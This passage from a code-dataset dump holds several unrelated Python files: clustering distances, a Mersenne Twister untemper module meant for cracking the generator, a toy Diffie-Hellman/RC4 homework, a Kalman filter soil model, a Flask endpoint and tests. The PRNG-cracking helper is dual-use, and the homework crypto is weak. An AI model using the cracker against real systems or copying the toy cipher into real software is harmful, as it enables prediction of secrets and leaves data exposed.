cluster2=deepcopy(clusterdf2)\n #make cost and constrains\n costs=dict()\n for i,data1 in cluster1.iterrows():\n for j,data2 in cluster2.iterrows():\n cost=calcost(data1,data2)\n costs[(i,j)]=cost\n \n model=pulp.LpProblem('cluster_matching',pulp.LpMinimize)\n f=dict()\n obfunc=list()\n for index,cost in costs.items():\n i,j=index\n f[i,j]=pulp.LpVariable('index{}_{}'.format(i,j),lowBound=0)\n obfunc.append(f[i,j]*cost)\n model+=pulp.lpSum(obfunc)\n\n for i,data1 in cluster1.iterrows():\n model += pulp.lpSum([f[(i,j)] for j,_ in cluster2.iterrows()])==1\n\n for j,data2 in cluster2.iterrows():\n model+= pulp.lpSum([f[(i,j)] for i,_ in cluster1.iterrows()])==1\n\n result=model.solve(pulp.PULP_CBC_CMD(msg = False))\n \n if result==1:\n if values:\n val=list()\n for var_ in f.values():\n if var_.varValue!=0:\n val.append((str(var_),float(var_.varValue)))\n return val\n if histgram:\n hist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n hist.append(var_.varValue*pow(costs[key],0.5))\n return hist\n if pair_atoms:\n pairlist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n site1='{}_{}'.format(cluster1.loc[key[0]].atom,cluster1.loc[key[0]].isite)\n site2='{}_{}'.format(cluster2.loc[key[1]].atom,cluster2.loc[key[1]].isite)\n pairlist.append((site1,site2))\n return pairlist\n dis_=float()\n sumf=float()\n if method=='average':\n for val in f.values():\n sumf+=val.varValue\n for key,val in f.items():\n dis_+=val.varValue*pow(costs[key],0.5)\n return dis_/sumf\n elif method=='max':\n hist=list()\n for key,var_ in f.items():\n if var_.varValue!=0:\n hist.append(var_.varValue*pow(costs[key],0.5))\n return max(hist)\n else:\n return nan\n\n\ndef cal_distance(csv_adress1,csv_adress2,values=False,histgram=False,method='average',pair_atoms=False):\n cluster1=pd.read_csv(csv_adress1,index_col=0)\n cluster2=pd.read_csv(csv_adress2,index_col=0)\n return cal_distance_df(clusterdf1=cluster1,clusterdf2=cluster2,values=values,histgram=histgram,method=method,pair_atoms=pair_atoms)\n\ndef parallel_self_distance(clusterdf,comb,pattern_j,method='average'):\n index_i,index_j=comb\n data_i=clusterdf.loc[index_i]\n data_j=clusterdf.loc[index_j]\n csvi='{}/{}_{}_0.csv'.format(data_i.adress,data_i.cifid,data_i.isite,0)\n csvj='{}/{}_{}_{}.csv'.format(data_j.adress,data_j.cifid,data_j.isite,pattern_j)\n if not (os.path.isfile(csvi) and os.path.isfile(csvj)):\n return ('{}_{}'.format(data_i.cifid,str(data_i.isite)),'{}_{}'.format(data_j.cifid,str(data_j.isite)),0,pattern_j,nan)\n disij=cal_distance(csvi,csvj,method=method)\n return ('{}_{}'.format(data_i.cifid,str(data_i.isite)),'{}_{}'.format(data_j.cifid,str(data_j.isite)),0,pattern_j,disij)\n\ndef make_distance_csv(listadress,resultname,outdir=False):\n tstime=time.perf_counter()\n if type(listadress) is str:\n all_cluster=pd.read_csv(listadress,index_col=0)\n elif type(listadress) is pd.DataFrame:\n all_cluster=listadress\n else:\n print('make_distance_csv error')\n all_index=all_cluster.index.to_list()\n comb=list(itertools.combinations(all_index,2))\n plist=[i for i in range(12)]\n alllen=12\n cont=0\n distance=list()\n for pi in plist:\n cont+=1\n print(\"\\r\"+str(cont)+'/'+str(alllen),end=\"\")\n fstime=time.perf_counter()\n distance_=Parallel(n_jobs=-1)(delayed(parallel_self_distance)(all_cluster,comb_,pi) for comb_ in comb)\n distance+=distance_\n etiem=time.perf_counter()\n #print('\\r\\ncomputation time {}'.format(etiem-fstime))\n disfile_colname=['isite_i','isite_j','pattern_i','pattern_j','distance']\n distancedf=pd.DataFrame(distance,columns=disfile_colname)\n if outdir:\n distancedf.to_csv('{}/{}'.format(outdir,resultname))\n else:\n distancedf.to_csv('{}'.format(resultname))\n print()\n print('output {}'.format(resultname))\n print('total computation time {}'.format(etiem-tstime))\n\ndef remake_distance(distanceadress,resultname=True,error_val=10**-8):\n if resultname:\n diradress=os.path.dirname(distanceadress)\n basename=os.path.basename(distanceadress).replace('.csv','')\n if len(diradress)==0:\n resultname='{}_remake'.format(basename)\n else:\n resultname='{}/{}_remake'.format(diradress,basename)\n distancedf=pd.read_csv(distanceadress,index_col=0)\n distancedf.loc[(distancedf.distance<=error_val),'distance']=0.0\n distancedf.to_csv(resultname)\n return","repo_name":"Kazushige-Takenaka/DCA","sub_path":"Distance_based_on_Cluster_Analysis/distance_func.py","file_name":"distance_func.py","file_ext":"py","file_size_in_byte":5431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71916005342","text":"from operator import lshift, rshift\r\n\r\n# Most of this code was shamelessly stolen from StealthyDev.\r\n# Although I did make some changes here and there and added some functions.\r\n\r\nN = 624\r\nM = 397\r\nMATRIX_A = 0x9908b0df\r\nUPPER_MASK = 0x80000000\r\nLOWER_MASK = 0x7fffffff\r\n\r\ndef unxorshift(x, operator, shift, mask=0xFFFFFFFF):\r\n res = x\r\n for _ in range(32):\r\n res = x ^ (operator(res, shift) & mask)\r\n return res\r\n\r\ndef untemper(random_int):\r\n random_int = unxorshift(random_int, rshift, 18)\r\n random_int = unxorshift(random_int, lshift, 15, 0xefc60000)\r\n random_int = unxorshift(random_int, lshift, 7, 0x9d2c5680)\r\n random_int = unxorshift(random_int, rshift, 11)\r\n return random_int\r\n\r\ndef temper(state_int):\r\n state_int ^= (state_int >> 11)\r\n state_int ^= (state_int << 7) & 0x9d2c5680\r\n state_int ^= (state_int << 15) & 0xefc60000\r\n state_int ^= (state_int >> 18)\r\n return state_int\r\n\r\ndef twist(i, i1, i397_or_624):\r\n y = (i & 0x80000000) + (i1 & 0x7fffffff) \r\n next = y >> 1\r\n if (y & 1) == 1:\r\n next ^= 0x9908b0df\r\n return next ^ i397_or_624\r\n\r\ndef new_state_fast(state: list[int]):\r\n '''Equivalent to new_state_slow, but faster'''\r\n mt = state.copy()\r\n for i in range(N):\r\n y = (mt[i] & UPPER_MASK) | (mt[i+1] & LOWER_MASK)\r\n z = mt[(i + M) % N] ^ (y >> 1) ^ (y & 1)*MATRIX_A\r\n mt[i] = z\r\n return mt\r\n\r\ndef new_state_slow(state: list[int]):\r\n '''Equivalent to new_state_fast, but the code is easier to understand for cracking purposes'''\r\n mt = state.copy() + [0]*N\r\n for i in range(N):\r\n y = (mt[i] & UPPER_MASK) | (mt[i+1] & LOWER_MASK)\r\n z = mt[i + M] ^ (y >> 1) ^ (y & 1)*MATRIX_A\r\n mt[i + N] = z\r\n return mt[-N:]\r\n\r\ndef randbits_to_uints(n: int, bits):\r\n assert n.bit_length() <= bits\r\n uints = [(n >> i) % 2**32 for i in range(0, bits, 32)]\r\n\r\n if bits % 32:\r\n uints[-1] <<= 32 - bits % 32\r\n assert uints[-1] < 2**32 # this lends some credence that this part of the code isn't broken\r\n\r\n return uints\r\n\r\ndef uints_to_randbits(uints, bits):\r\n L = len(uints) - 1\r\n n = 0\r\n for i in range(L):\r\n n |= uints[i] << 32*i\r\n\r\n u = uints[-1]\r\n if bits%32:\r\n u >>= (32 - bits%32)\r\n\r\n return n | u << 32*L\r\n","repo_name":"AZ-0/scripts","sub_path":"random/mersenne.py","file_name":"mersenne.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36345371923","text":"import numpy\nimport random\nimport time\n#We will store the values of private keys into private 1 and 2, private 1 and 2\n#will be the output of combined congruential method.\n#We will have alpha and q to obtain the public keys(x1 and x2) for the Diffie\n#Hellman's Algorithm.\n#we will use public keys x1 and x2 to generate secret key.\n#variables y1 and y2 2 random numbers intermediate values in the combined\n#congruential algorithm.\n#variables a1,a2,m1 and m2 are used to generate y1, y2, and x.\n#x holds the list of each generator value, or eachprivate key in this case.\nprivate1=0\nprivate2=0\nalpha=3\nq=353\nx=numpy.zeros(3)\ny1=numpy.zeros(3)\ny2=numpy.zeros(3)\nm1=2147483642\nm2=2147483423\na1=450\na2=234\nwhile True:\n y1[0]=random.randint(1, 2147483641)\n y2[0]=random.randint(1, 2147483422)\n i=0\n x[0]=0\n\n for i in range(2):\n y1[i+1]=(a1*y1[i])%m1\n y2[i+1]=(a2*y2[i])%m2\n x[i+1]=(y1[i+1]-y2[i+1])%(m1-1)\n\n private1=int(x[1]%500)\n private2=int(x[2]%500)\n\n if private10:\n count=(count//8)+1\nelse:\n count=count//8\n\nfor i in range(count\n ):\n block.append([])\n\ni=0\nblock[i].append(cont[0])\nfor j in range(1,len(cont)):\n if i0:\n print(\"\\n\\nThe Block of plain text is:\\n\",block[i-2])\nelse:\n print(\"\\n\\nThe Block of plain text is:\\n\",block[i-1])\n#We will create list s contsining a range from 0-255, and t which will\n#contain our secret key value as discussed earlier. \nsecretkeylist=numpy.zeros(l)\ns=numpy.zeros(256)\nt=numpy.zeros(256)\nsecretkey=str(secretkey)\nfor i in range(l):\n secretkeylist[i]=int(secretkey[i])\nfor i in range(256):\n s[i]=i\n t[i]=secretkeylist[i%l]\n\nj=0\n#we will find j as a value of j+s[i]+t[i] mod 256 and swap s[i] and s[j]\nfor i in range(255):\n j=int((j+s[i]+t[i])%256)\n temp=s[i]\n s[i]=s[j]\n s[j]=temp\n\n#In the end we get a new s array. Now we will give new values for i and j and again swap s[i] and s[j]\n#we will take the last value as s[t] and store it in k. This k will be used to encrypt the block of plaintext\ni=0\nj=0\nk=0\ncount3=0\nwhile True:\n i=int((i+1)%256)\n if(i==0):\n count3+=1\n if(count3==2):\n break\n j=int((j+s[i])%256)\n \n temp=s[i]\n s[i]=s[j]\n s[j]=temp\n t=int(s[i]+s[j])%256\n k=int(s[t])\n \nif count2>0:\n count=count-2\n pt=block[count]\nelse:\n count=count-1\n pt=block[count]\n \n#We will then take key k and xor with the ascii value of plain text, and convert the new integer list to a character string\n#This new character String is the cipher text.\nptascii=numpy.zeros(len(pt))\nct=numpy.zeros(len(pt))\ncipher=[]\n\nfor i in range(len(pt)):\n ptascii[i]=ord(pt[i])\n ct[i]=int(ptascii[i])^k\n cipher.append(chr(int(ct[i]%26)+97))\ncipher=\"\".join(cipher)\nprint(\"The Encrypted Text is:\",cipher)\ncipher=input(\"Please enter the ciphertext:\")\n#We will ask the user to provide cipher text. We will use the cipher text to generatean integer matrix.\n#We will use the key k to xor the cipher text back to plain text. \nctq=numpy.zeros(len(pt))\nctr=numpy.zeros(len(pt))\nfor i in range(len(pt)):\n ctq[i]=ct[i]//26\n ctr[i]=int((ord(cipher[i])-97)%26)\nplain=[]\npt1=numpy.zeros(len(ct))\nfor i in range(len(ct)):\n pt1[i]=ctq[i]*26+ctr[i]\n pt1[i]=int(pt1[i])^k\n plain.append(chr(int(pt1[i])))\nplain=\"\".join(plain)\nprint(\"The decrypted text is:\",plain)\ntime.sleep(1000)\n","repo_name":"SIDDHARTHSS93/Computer-Security-Assignments","sub_path":"Siddharth_Shyamsunder_1802772/ass2.py","file_name":"ass2.py","file_ext":"py","file_size_in_byte":5069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"41008435817","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 20 13:03:54 2018\n\n@author: sbo\n\"\"\"\n\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport csv\nimport math\nimport time\nfrom PyFoam.Error import error\nfrom PyFoam.Execution.BasicRunner import BasicRunner\nfrom PyFoam.RunDictionary.ParsedParameterFile import ParsedParameterFile\nfrom filterpy.kalman import EnsembleKalmanFilter as EnKF\nfrom filterpy.common import Q_discrete_white_noise\nfrom numpy import dot, zeros, ones, eye, outer\nfrom numpy.random import randn\nfrom numpy.random import multivariate_normal\nfrom scipy.linalg import inv\n\n# User selection: nominal model + EnKF or real model + EnKF\n#ans = int(input('Type 1 for (nominalmodel + EnKF), or 2 for (realmodel + EnKF): '))\n#if ans == 1:\n# csvFileNameT = 'nominalmodelT.csv'\n# csvFileNameF = 'nominalmodelF.csv'\n# std_noise_Q = 0.\n# std_noise_R = 0.0025\n\n#elif ans == 2:\n# csvFileNameT = 'realmodel.csv'\n# # User selection: Large Q/R (process noise/measurement noise) or Large R/Q?\n# ans = int(input('Type 1 for large process noise (small measurement noise), or 2 '\n# 'for small process noise (large measurement noise): '))\n# if ans == 1:\n# Q_to_R = 100\n# std_noise_R = 0.001 # measurement noise\n# std_noise_Q = std_noise_R * Q_to_R # process noise\n# elif ans == 2:\n# R_to_Q = 100\n# std_noise_Q = 0.001 # process noise\n# std_noise_R = std_noise_Q * R_to_Q # measurements noise\n# else:\n# print('Invalid input')\n#else:\n# print('Invalid input')\n\n##\n##\n##\nstart_time = time.clock()\n\n# Change the time precision written in OpenFoam\ncontrol = ParsedParameterFile('system/controlDict')\ncontrol['timePrecision'] = 10\ncontrol.writeFile()\n# Change the blockMeshDict\nlengthOfField = 5\ndx = 1\nnodesInX = int(lengthOfField/dx)\n\ndepth = 1\ndz = 0.02\nnodesInZ = int(depth/dz)\n\nnumberOfGrids = nodesInX * nodesInX\n#numberOfGrids = 1\nmesh = ParsedParameterFile('constant/polyMesh/blockMeshDict')\nmesh['vertices'] = [[0, 0, 0],\n [lengthOfField, 0, 0],\n [lengthOfField, lengthOfField, 0],\n [0, lengthOfField, 0],\n [0, 0, depth],\n [lengthOfField, 0, depth],\n [lengthOfField, lengthOfField, depth],\n [0, lengthOfField, depth]]\nmesh['blocks'] = ['hex (0 1 2 3 4 5 6 7) ('+str(nodesInX)+' '+str(nodesInX)+' '+str(nodesInZ)+') simpleGrading (1 1 1)']\nmesh.writeFile()\n\n# Read data from CSV files\ncsvFileNameTPlot = 'nominalmodelT_plot.csv'\ncsvFileNameTCal = 'nominalmodelT_cal.csv'\ncsvFileNameF = 'nominalmodelF.csv'\nstd_noise_Q = 0.0\nstd_noise_R = 0.0137\n\n# Parameters of the system\ntimeSpan = 20 # Time\ndt = 86400\n\ndim_u = 1 # Number of inputs\n#dim_z = 1 # Number of measurements\n\nN = 10 # sigma points\n\n# Initial condition\n#h_initialTrue = -0.01\n#h_initialTrue1 = -0.99\nh_initial = -0.5\n#h_iTrue = np.ones(nodesInZ)*h_initialTrue\n#h_iTrue1 = np.ones(nodesInZ)*h_initialTrue1\nh_i = np.ones(nodesInZ*numberOfGrids)*h_initial\nu_i = zeros(dim_u)\n\n# Variance / Covariance\n#stdState = 0.15811 # State covariance\nstdState = 0.025 # State covariance\nstdNoise = 0.0 # Process and measurement covariance\n\n# h function, which maps states matrix into predicted measurements\ndepthOfSensor = [5, 10,15, 20,30,35,40, 45]\nH = zeros(nodesInZ*numberOfGrids)\nif depthOfSensor == []:\n H = ones(nodesInZ*numberOfGrids)\n\nfor item in depthOfSensor:\n node = nodesInZ - 1 - item\n slicePosition = node*numberOfGrids\n H[node*numberOfGrids: (node+1)*numberOfGrids] = 1\n#H = np.ones(nodesInZ*numberOfGrids)\n\n# Number of measurements\ndim_z = 0\nfor element in H:\n if element != 0:\n dim_z += 1\n##\n##\n##\n \n# Define EnKF\n#xTrue = np.array(h_iTrue)\n#xTrue1 = np.array(h_iTrue1)\nx = np.array(h_i)\nu = np.array(u_i)\nP = np.eye(nodesInZ*numberOfGrids) * stdState * stdState\n\nf = EnKF(x=x, u=u, P=P, dim_z=dim_z, N=N)\nf.R *= std_noise_R ** 2\nf.Q *= std_noise_Q ** 2\nensemble = f.initialize(x=x, P=P)\n\n# Generating lists for data collection and for plots\nthetaList = []\nThetaListOne = []\nThetaListAll = []\n\nThetaU = []\nThetaUR = []\nThetaListMeanU = []\nmeasurementListTPlot = []\nmeasurementListTCal = []\nmeasurementListF = []\nmeasurementSensorList = []\nThetaListMeanUForPlot = []\nThetaListMeanUAllForPlot = []\n\nresultsTCal = []\nwith open(csvFileNameTCal) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsTCal.append(row)\nfor i in range(len(resultsTCal)):\n measurementListTCal.append(resultsTCal[i])\n for index, item in enumerate(measurementListTCal[i]):\n measurementListTCal[i][index] = float(item) \n \nresultsTPlot = []\nwith open(csvFileNameTPlot) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsTPlot.append(row)\nfor i in range(len(resultsTPlot)):\n measurementListTPlot.append(resultsTPlot[i])\n for index, item in enumerate(measurementListTPlot[i]): # Actually elements in resultTPlot are floats \n measurementListTPlot[i][index] = float(item)\n \nresultsF = []\nwith open(csvFileNameF) as csvFile:\n readCsv = csv.reader(csvFile)\n for row in readCsv:\n resultsF.append(row)\nfor i in range(len(resultsF)):\n measurementListF.append(resultsF[i])\n for index, item in enumerate(measurementListF[i]):\n measurementListF[i][index] = float(item)\n\n## Change the time precision written in OpenFoam\n#control = ParsedParameterFile('system/controlDict')\n#control['timePrecision'] = 10\n\n# Prediction using the model\nblockRun=BasicRunner(argv=[\"blockMesh\"],\n silent=True,\n server=False)\nprint (\"Running blockMesh\")\nblockRun.start()\nif not blockRun.runOK():\n error(\"There was a problem with blockMesh\")\n \nprint (\"Running RichardsFoam2\")\n#for n in range(numberOfGrids):\n# print('Grids number: ', n+1)\nfor k in range(timeSpan): # N ensemble member \n print('EnKF 7')\n print('At day: ', k+1)\n ThetaListAll = []\n for i in range(N):\n print('Ensemble number: ', i+1)\n ThetaListOne = [] \n for j in range(1):\n control[\"startTime\"] = k*86400 \n control[\"endTime\"] = (k+1)*86400\n \n control.writeFile()\n\n state = ParsedParameterFile(str(control[\"startTime\"])+'/psi')\n if k == 0: \n nonuniform = []\n for l in range(len(ensemble[i])):\n nonuniform.append(str(ensemble[i, l])+'\\n')\n state[\"internalField\"] = ' nonuniform List\\n' +\\\n str(len(nonuniform))+'\\n' +\\\n str('(\\n') + ''.join(nonuniform)+\\\n str(')') \n state.writeFile()\n else:\n nonuniform1 = []\n Positive = []\n for m in range(len(ThetaU[i])):\n nonuniform1.append(str(ThetaU[i][m])+'\\n')\n state[\"internalField\"] = ' nonuniform List\\n' +\\\n str(len(nonuniform1))+'\\n' +\\\n str('(\\n') + ''.join(nonuniform1)+\\\n str(')') \n for index, item in enumerate(nonuniform1):\n if float(item) >= 0:\n Positive.append([index, item])\n state.writeFile()\n\n theRun=BasicRunner(argv=[\"RichardsFoam2_PF\"],\n silent=True)\n theRun.start()\n print('At day: ', k+1)\n \n thetaList = []\n c = False\n c0 = 1\n Theta = open(str(control[\"endTime\"])+'/psi', 'r')\n csvReader = csv.reader(Theta)\n for line in Theta:\n if line == '(\\n':\n c = True\n c0 = 0\n if line in [')\\n', ');', ');\\n']:\n c = False\n break\n if c == True & c0 == 1:\n line.rstrip()\n line_float = float(line)\n thetaList.append(line_float) \n c0 = 1 \n ThetaListOne.append(thetaList)\n ThetaListAll.extend(ThetaListOne)\n# End of calculation\n \n ThetaListAll = np.array(ThetaListAll)\n# meanValueP = np.mean(ThetaListAll, axis=0)\n# ThetaListMean.append(meanValueP)\n \n\n measurement = measurementListTCal[k]\n measurementArray = np.array(measurement)\n measurementArray = measurementArray + randn()*std_noise_R\n if dim_z == 1: # seems useless. dim_z ==1 only happens when working with 1D EnKF\n measurementSensor = measurementArray[depthOfSensor]\n elif dim_z == nodesInZ*numberOfGrids:\n measurementSensor = measurementArray\n else:\n l = 0\n measurementSensor = np.ones(dim_z)\n for index, item in enumerate(H):\n if item != 0:\n measurementSensor[l] = measurementArray[index]\n l += 1\n measurementSensorList.append(measurementSensor)\n ThetaU = f.update(ThetaListAll, measurementSensor, H)\n# ThetaUR = []\n# for i in range(len(ThetaU)):\n# ThetaU1 = ThetaU[i]#[::-1]\n# ThetaUR.append(ThetaU1)\n ThetaMeanU = np.mean(ThetaU, axis=0)\n ThetaListMeanU.append(ThetaMeanU)\n\n\n# depthList\ndepthList = []\nfor i in range(0,depth*nodesInZ):\n depthList.append(-1*i*dz)\nxTrue1 = ones(nodesInZ)*-0.2\nxTrue5 = ones(nodesInZ)*-0.8\nxF = ones(nodesInZ)*-0.5\n\nfor i in range(timeSpan):\n ThetaListMeanUForPlot = []\n for j in range(numberOfGrids):\n l = j\n ThetaListMeanT1Grid = []\n for k in range(nodesInZ): \n value = ThetaListMeanU[i][l]\n ThetaListMeanT1Grid.append(value)\n l += numberOfGrids\n ThetaListMeanT1GridR = ThetaListMeanT1Grid[::-1]\n ThetaListMeanUForPlot.append(ThetaListMeanT1GridR)\n ThetaListMeanUAllForPlot.extend(ThetaListMeanUForPlot)\n\n## ThetaListMeanU\n#plotU1Day = []\n#plotUAll = []\n#for i in range(timeSpan):\n# plotU1Day = []\n# for j in range(numberOfGrids):\n# plotU = ThetaListMeanU[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotU1Day.append(plotU)\n# plotUAll.extend(plotU1Day)\n\n## measurementListF\n#plotF1Day = []\n#plotFAll = []\n#for i in range(timeSpan):\n# plotF1Day = []\n# for j in range(numberOfGrids):\n# plotF = measurementListF[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotF1Day.append(plotF)\n# plotFAll.extend(plotF1Day)\n \n## measurementListTCal\n#plotT1Day = []\n#plotTAll = []\n#for i in range(timeSpan):\n# plotT1Day = []\n# for j in range(numberOfGrids):\n# plotT = measurementListTCal[i][j*nodesInZ:((j+1)*nodesInZ)]\n# plotT1Day.append(plotT)\n# plotTAll.extend(plotT1Day)\n\n\n##Plot the graph\n#plt.plot(xTrue, depthList, linestyle = '--', label='Process')\n#plt.plot(x, depthList, label='Initial guess')\n#plt.xlabel('Soil pressure head, h (m)')\n#plt.ylabel('Soil depth, z (m)')\n#plt.title('Initial pressure head profile')\n#plt.legend()\n#plt.show()\n\n\n#for n in range(numberOfGrids): \n# print('Grid number: ', n)\n# for i in range(timeSpan):\n# #f, axarr = plt.subplots(timeSpan, 2, sharey = 'depthList')\n# plt.plot(measurementListTPlot[i*numberOfGrids+n], depthList, linestyle = '--', label='Process '+str(i+1)+' day')\n# plt.plot(measurementListF[i*numberOfGrids+n], depthList, label='Openloop prediction '+str(i+1)+' day')\n# plt.plot(ThetaListMeanUAllForPlot[i*numberOfGrids+n], depthList, label='EnKF update '+str(i+1)+' day')\n# #plt.scatter(measurementSensorList[i], depthList[depthOfSensor], label='Sensor '+str(i+1)+' day')\n# plt.xlabel('Soil pressure head, h (m)')\n# plt.ylabel('Soil depth, z (m)')\n# plt.title('Predicted soil pressure head profile')\n# plt.legend()\n# plt.show()\n#\n# try:\n# input(\"Press enter to continue\")\n# except SyntaxError:\n# pass\n \nfor n in range(5):\n print('Grid number: ', n+1)\n if n == 0:\n plt.plot(xTrue1, depthList, linestyle = '--', label='Process')\n plt.plot(xF, depthList, label='Initial guess')\n plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Initial pressure head profile')\n plt.legend()\n plt.show()\n if n == 4:\n plt.plot(xTrue5, depthList, linestyle = '--', label='Process')\n plt.plot(xF, depthList, label='Initial guess')\n plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Initial pressure head profile')\n plt.legend()\n plt.show() \n for i in range(timeSpan):\n #f, axarr = plt.subplots(timeSpan, 2, sharey = 'depthList')\n plt.plot(measurementListTPlot[i*numberOfGrids+n], depthList, linestyle = '--', label='Process '+str(i+1)+' day')\n plt.plot(measurementListF[i*numberOfGrids+n], depthList, label='Openloop prediction '+str(i+1)+' day')\n plt.plot(ThetaListMeanUAllForPlot[i*numberOfGrids+n], depthList, label='EnKF update '+str(i+1)+' day')\n #plt.scatter(measurementSensorList[i], depthList[depthOfSensor], label='Sensor '+str(i+1)+' day')\n plt.xlabel('Soil pressure head, h (m)')\n plt.ylabel('Soil depth, z (m)')\n plt.title('Predicted soil pressure head profile')\n plt.legend()\n plt.show()\n\n# try:\n# input(\"Press enter to continue\")\n# except SyntaxError:\n# pass\n\nprint((time.clock() - start_time)/60, 'minutes') \n \n \n\n \n\n\n","repo_name":"sbo5/irrigation","sub_path":"Ubuntu_codes/state_estimation_enkf_box_sim/model_enkf.py","file_name":"model_enkf.py","file_ext":"py","file_size_in_byte":13776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"33928140618","text":"# Flask server\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\napp = Flask(__name__)\nCORS(app)\n\n\n@app.route(\"/getData\")\ndef get_data():\n with open(\"data.txt\", \"r\") as f:\n return jsonify({\n \"masks\": f.readline(),\n \"nonmasks\": f.readline(),\n })\n\n\nif __name__ == \"__main__\":\n app.run(debug=False, port=5000, host='0.0.0.0')\n","repo_name":"Keraisyn/covid-control","sub_path":"back-end/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"6092400001","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def isPalindrome(self, head):\n fast = slow = head\n stack = []\n\n while fast and fast.next:\n stack.append(slow.val)\n slow = slow.next\n fast = fast.next\n\n if fast:\n slow = slow.next\n \n while slow:\n if stack.pop() != slow.val:\n return False\n slow = slow.next\n return True","repo_name":"liugongfeng/leetCode","sub_path":"LeetCode 234.py","file_name":"LeetCode 234.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43743630448","text":"# -*- coding: utf-8 -*-\n\nimport unittest\nimport html\nfrom downloader.youtube_downloader import RessourceYT, Youtube_Dl\nfrom downloader import global_proxy\nfrom unittest import mock\n\n\n# ------------------------------------------------------------------------------------------------------\n# Implémentation des Tests unitaires\n# Auteur : SDI\n# Date : 15/02/2020\n# Objectif : educationnal purpose only. Merci de respecter les copyrights.\n# ------------------------------------------------------------------------------------------------------\n\n\nclass TestYoutubeDownloader(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.src= TestYoutubeDownloader.read_file_to_html(\"data/youtube_download_test_data.html\")\n cls.YoutubeDl = Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA&list=PL4OLSC172x8p8Dy-A88_k_zhKRvpPwRgq\")\n\n # Lecture des fichier html en utf8\n @staticmethod\n def read_file_to_html(filename):\n with open(filename) as f:\n h = f.read()\n return html.unescape(h)\n\n # --------------------------------------------------------------------------\n # Tests Classe RessourceFile\n # --------------------------------------------------------------------------\n def test_ressourcesYT(self):\n r1 = RessourceYT(link='https://www.youtube.com/watch?v=1', downloaded=True)\n r2 = RessourceYT(link='https://www.youtube.com/watch?v=1', downloaded=False)\n r3 = RessourceYT(link='https://www.youtube.com/watch?v=3')\n self.assertEqual(r1,r2)\n self.assertNotEqual(r2,r3)\n self.assertEqual(None, r1.titre)\n self.assertEqual(None, r2.length)\n\n # --------------------------------------------------------------------------\n # Tests Classe Downloader:\n # --------------------------------------------------------------------------\n\n @mock.patch('downloader.youtube_downloader.Youtube_Dl._get_srcpage')\n def test_get_youtube_vids_on_url(self, mockrequest):\n mockrequest.return_value = self.src\n rs = self.YoutubeDl.get_youtube_vids_on_url()\n self.assertIsInstance(rs, list)\n self.assertIsInstance(rs[0],RessourceYT)\n self.assertEqual(39, len(rs))\n self.assertIn(RessourceYT(link='https://www.youtube.com/watch?v=ua2WkSvmylw'), rs)\n\n\n @mock.patch('downloader.youtube_downloader.Youtube_Dl._get_srcpage')\n def test_get_youtube_vids_on_url_without_playlist(self, mockrequest):\n mockrequest.return_value = self.src\n yt = Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\")\n rs = yt.get_youtube_vids_on_url()\n self.assertIsInstance(rs, list)\n self.assertIsInstance(rs[0], RessourceYT)\n self.assertEqual(1, len(rs))\n self.assertEqual(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\", rs[0].link)\n\n\n def test_get_paramplaylist_from_url(self):\n self.assertEqual(\"PL4OLSC172x8p8Dy-A88_k_zhKRvpPwRgq\", self.YoutubeDl._get_playlist_param_from_url())\n self.assertEqual(\"\", Youtube_Dl(\"https://www.youtube.com/watch?v=HGp5UnNiLOA\")._get_playlist_param_from_url())\n with self.assertRaises(Exception):\n self.assertEqual(\"\", Youtube_Dl(\"https://www.youtube.com\")._get_playlist_param._from_url())\n self.assertEqual(\"\", Youtube_Dl(\"\")._get_playlist_param_from_url())\n\n","repo_name":"StephaneDci/downloader","sub_path":"test/test_youtube_downloader.py","file_name":"test_youtube_downloader.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20894810802","text":"from src import db\nfrom uuid import uuid4\n\nclass Reservation(db.Model):\n __tablename__ = \"reservation\"\n \n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String(255), unique=True)\n first_name = db.Column(db.String(110), nullable=False)\n second_name = db.Column(db.String(110), nullable=False)\n email = db.Column(db.String(25), nullable=False, unique=True)\n event_id = db.Column(db.Integer, db.ForeignKey(\"events.id\"), nullable=False)\n\n def __init__(self, first_name, second_name, email, event_id):\n self.uuid = str(uuid4())\n self.first_name = first_name\n self.second_name = second_name\n self.email = email\n self.event_id = event_id\n\nclass Event(db.Model):\n __tablename__ = \"events\"\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120), nullable=False, unique=True)\n description = db.Column(db.Text)\n reservation = db.relationship(\"Reservation\", backref='events', 